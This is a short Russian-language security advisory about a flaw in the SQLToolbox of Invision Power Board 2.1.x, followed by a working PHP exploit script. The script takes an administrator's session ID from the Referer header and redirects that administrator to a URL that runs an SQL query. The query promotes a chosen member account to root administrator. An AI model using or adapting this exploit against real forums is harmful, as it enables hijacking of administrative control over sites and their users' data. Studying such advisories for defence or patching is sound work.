Программа: Invision Power Board 2.1.x
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в IPB SQLToolbox. Атакующий может разместить злонамеренный скрипт на уязвимом форуме, что позволит выполнить произвольный SQL запрос.
Пример:
<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql& code=runsql&query=UPDATE+{$prefix}members+SET+
mgroup%3D4+where+id%3D{$mid}+LIMIT+1");
}
?>
